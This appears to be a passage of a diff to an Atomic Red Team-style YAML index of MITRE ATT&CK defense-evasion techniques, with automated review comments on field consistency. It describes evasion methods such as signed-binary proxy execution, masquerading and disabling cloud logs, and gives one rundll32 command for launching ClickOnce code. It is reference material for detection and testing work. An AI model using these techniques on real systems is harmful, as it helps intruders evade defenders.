Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -24471,7 +24615,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.010
atomic_tests:
- name: Regsvr32 local COM scriptlet execution
@@ -24647,7 +24790,7 @@ defense-evasion:
name: command_prompt
T1036.003:
technique:
- modified: '2023-09-14T21:12:48.411Z'
+ modified: '2024-09-12T19:30:45.065Z'
name: 'Masquerading: Rename System Utilities'
description: 'Adversaries may rename legitimate system utilities to try to evade
security mechanisms concerning the usage of those utilities. Security monitoring
@@ -24696,8 +24839,8 @@ defense-evasion:
external_id: T1036.003
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -24712,9 +24855,8 @@ defense-evasion:
url: https://lolbas-project.github.io/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.003
atomic_tests:
- name: Masquerading as Windows LSASS process
@@ -24893,7 +25035,7 @@ defense-evasion:
elevation_required: true
T1562.011:
technique:
- modified: '2023-04-12T22:46:33.995Z'
+ modified: '2024-10-16T20:12:44.962Z'
name: Spoof Security Alerting
description: |-
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -24905,7 +25047,7 @@ defense-evasion:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -24935,13 +25077,12 @@ defense-evasion:
url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -25002,7 +25143,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests:
- name: Execution of program.exe as service with unquoted service path
@@ -25086,11 +25226,10 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -25114,11 +25253,10 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -25143,9 +25281,8 @@ defense-evasion:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.002:
technique:
@@ -25225,7 +25362,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.009:
technique:
@@ -25259,7 +25395,7 @@ defense-evasion:
- source_name: LOLBAS Regasm
url: https://lolbas-project.github.io/lolbas/Binaries/Regasm/
description: LOLBAS. (n.d.). Regasm.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:55:48.725Z'
name: 'Signed Binary Proxy Execution: Regsvcs/Regasm'
description: |-
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
@@ -25286,8 +25422,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.009
atomic_tests:
- name: Regasm Uninstall Method Call Test
@@ -25461,7 +25595,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.004
atomic_tests:
- name: Install root CA on CentOS/RHEL
@@ -25675,43 +25808,20 @@ defense-evasion:
elevation_required: true
T1027.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
- type: attack-pattern
- created: '2020-03-16T15:30:57.711Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1027.004
- url: https://attack.mitre.org/techniques/T1027/004
- - description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
- in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
- campaign. Retrieved November 29, 2018.'
- url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
- source_name: ClearSky MuddyWater Nov 2018
- - source_name: TrendMicro WindowsAppMac
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
- description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
- Info Stealer and Adware. Retrieved April 25, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-03T17:43:14.766Z'
name: 'Obfuscated Files or Information: Compile After Delivery'
description: |-
- Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
+ Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor the execution file paths and command-line arguments
for common compilers, such as csc.exe and GCC/MinGW, and correlate with other
suspicious behavior to reduce false positives from normal user and administrator
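Review bot: the description now names ilasm.exe as a compiler and cites `(Citation: ATTACK IQ)`, but `x_mitre_detection` in the same hunk still tells defenders to monitor only "common compilers, such as csc.exe and GCC/MinGW". If the detection text is maintained in this file, extend that list to include ilasm.exe so the monitoring guidance matches the description. The citation itself resolves, since a later hunk adds an `external_references` entry whose `source_name` is exactly `ATTACK IQ`.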
@@ -25720,9 +25830,14 @@ defense-evasion:
and execution frameworks like Mono and determine if they have a legitimate
purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these
should only be used in specific and limited cases, like for software development.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Creation'
@@ -25734,12 +25849,35 @@ defense-evasion:
- Anti-virus
- Binary Analysis
- Static File Analysis
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Compiler software (either native to the system or delivered by the adversary)
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617
+ created: '2020-03-16T15:30:57.711Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/004
+ external_id: T1027.004
+ - source_name: ClearSky MuddyWater Nov 2018
+ description: 'ClearSky Cyber Security. (2018, November). MuddyWater Operations
+ in Lebanon and Oman: Using an Israeli compromised domain for a two-stage
+ campaign. Retrieved November 29, 2018.'
+ url: https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
+ - source_name: ATTACK IQ
+ description: 'Federico Quattrin, Nick Desler, Tin Tam, & Matthew Rutkoske.
+ (2023, March 16). Hiding in Plain Sight: Monitoring and Testing for Living-Off-the-Land
+ Binaries. Retrieved July 15, 2024.'
+ url: https://www.attackiq.com/2023/03/16/hiding-in-plain-sight/
+ - source_name: TrendMicro WindowsAppMac
+ description: Trend Micro. (2019, February 11). Windows App Runs on Mac, Downloads
+ Info Stealer and Adware. Retrieved April 25, 2019.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1027.004
atomic_tests:
- name: Compile After Delivery using csc.exe
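Review bot: `x_mitre_permissions_required` with its single `User` entry is removed from T1027.004 without a replacement, while `x_mitre_system_requirements` on the adjacent line is kept. If this mirrors the upstream ATT&CK object that is fine, but the commit message should name the upstream release this syncs to so that field removals like this one (and the `spec_version` removals elsewhere in the patch) can be verified against it rather than read as accidental data loss.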
@@ -25948,7 +26086,7 @@ defense-evasion:
url: https://github.com/decalage2/oletools
description: decalage2. (2019, December 3). python-oletools. Retrieved September
18, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T14:02:07.944Z'
name: VBA Stomping
description: |-
Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
@@ -25974,12 +26112,10 @@ defense-evasion:
x_mitre_system_requirements:
- MS Office version specified in _VBA_PROJECT
stream must match
host
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -26069,7 +26205,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests:
- name: Bitsadmin Download (cmd)
@@ -26252,7 +26387,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127.001
atomic_tests:
- name: MSBuild Bypass Using Inline Tasks (C#)
@@ -26333,7 +26467,7 @@ defense-evasion:
name: command_prompt
T1656:
technique:
- modified: '2023-09-30T19:45:05.886Z'
+ modified: '2024-10-15T15:59:06.382Z'
name: Impersonation
description: "Adversaries may impersonate a trusted person or organization in
order to persuade and trick a target into performing some action on their
@@ -26375,10 +26509,9 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
type: attack-pattern
@@ -26402,18 +26535,30 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1578.005:
technique:
- modified: '2023-10-02T22:17:54.968Z'
+ modified: '2024-09-25T14:15:26.322Z'
name: Modify Cloud Compute Configurations
- description: |-
- Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
- For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
- Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+ description: "Adversaries may modify settings that directly affect the size,
+ locations, and resources available to cloud compute infrastructure in order
+ to evade defenses. These settings may include service quotas, subscription
+ associations, tenant-wide policies, or other configurations that impact available
+ compute. Such modifications may allow adversaries to abuse the victim’s compute
+ resources to achieve their goals, potentially without affecting the execution
+ of running instances and/or revealing their activities to the victim.\n\nFor
+ example, cloud providers often limit customer usage of compute resources via
+ quotas. Customers may request adjustments to these quotas to support increased
+ computing needs, though these adjustments may require approval from the cloud
+ provider. Adversaries who compromise a cloud environment may similarly request
+ quota adjustments in order to support their activities, such as enabling additional
+ [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+ suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+ 2023) Adversaries may also increase allowed resource usage by modifying any
+ tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+ Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+ where cloud resources can be deployed, such as enabling [Unused/Unsupported
+ Cloud Regions](https://attack.mitre.org/techniques/T1535). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
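Review bot: the new T1578.005 description ends with a trailing space inside the quoted scalar (`...techniques/T1535). "`), which will be preserved in the parsed string; trim it. Switching the field from the `|-` block scalar to a folded double-quoted string with `\n\n` escapes also turns a one-paragraph content change (dropping the subscription hijacking paragraph) into a rewrite of every line, which makes the actual edit hard to review; keeping the `|-` style would have produced a diff of only the removed lines. The removed paragraph's two citations, Microsoft Peach Sandstorm 2023 and Microsoft Subscription Hijacking 2022, are consistently removed from `external_references` in a later hunk, and Microsoft Azure Policy is kept because the surviving text still cites it, so the citations stay consistent.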
@@ -26427,7 +26572,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
type: attack-pattern
@@ -26439,20 +26584,11 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/005
external_id: T1578.005
- - source_name: Microsoft Subscription Hijacking 2022
- description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
- using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
- url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
- source_name: Microsoft Cryptojacking 2023
description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
Understanding and defending against cloud compute resource abuse. Retrieved
September 5, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
- - source_name: Microsoft Peach Sandstorm 2023
- description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
- password spray campaigns enable intelligence collection at high-value targets.
- Retrieved September 18, 2023.
- url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
- source_name: Microsoft Azure Policy
description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
Retrieved September 5, 2023.
@@ -26461,11 +26597,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.008:
technique:
- modified: '2024-04-12T21:13:56.431Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Impair Defenses: Disable Cloud Logs'
description: |-
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -26474,6 +26609,7 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -26483,6 +26619,7 @@ defense-evasion:
- Janantha Marasinghe
- Matt Snyder, VMware
- Joe Gumke, U.S. Bank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
for: StopLogging
and DeleteTrail
.(Citation: Stopping
@@ -26494,13 +26631,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- - Office 365
- x_mitre_version: '2.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'User Account: User Account Modification'
@@ -26545,9 +26682,6 @@ defense-evasion:
url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.008
atomic_tests:
- name: AWS - CloudTrail Changes
@@ -27172,7 +27306,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.003
atomic_tests:
- name: Hidden Window
@@ -27234,15 +27367,138 @@ defense-evasion:
'
name: powershell
elevation_required: true
+ T1127.002:
+ technique:
+ modified: '2024-10-17T18:50:41.474Z'
+ name: ClickOnce
+ description: |-
+ Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+ Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+ ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+ Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+ Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Wirapong Petshagun
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Metadata'
+ - 'Module: Module Load'
+ x_mitre_system_requirements:
+ - ".NET Framework"
+ type: attack-pattern
+ id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+ created: '2024-09-09T14:39:28.637Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1127/002
+ external_id: T1127.002
+ - source_name: LOLBAS /Dfsvc.exe
+ description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+ - source_name: Microsoft Learn ClickOnce
+ description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+ Retrieved September 9, 2024.
+ url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+ - source_name: SpectorOps Medium ClickOnce
+ description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+ (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+ url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+ - source_name: NetSPI ClickOnce
+ description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+ Love Story. Retrieved September 9, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+ - source_name: Burke/CISA ClickOnce Paper
+ description: William J. Burke IV. (n.d.). Appref-ms Abuse for Code Execution
+ & C2. Retrieved September 9, 2024.
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+ - source_name: Burke/CISA ClickOnce BlackHat
+ description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+ IN: When .appref-ms abuse is operating as intended. Retrieved September
+ 9, 2024.'
+ url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1070.010:
+ technique:
+ modified: '2024-10-13T15:48:46.391Z'
+ name: Relocate Malware
+ description: |-
+ Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+ Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+ Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Matt Anderson, @nosecurething, Huntress
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+ created: '2024-05-31T11:07:57.406Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/010
+ external_id: T1070.010
+ - source_name: Latrodectus APR 2024
+ description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+ (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+ 31, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
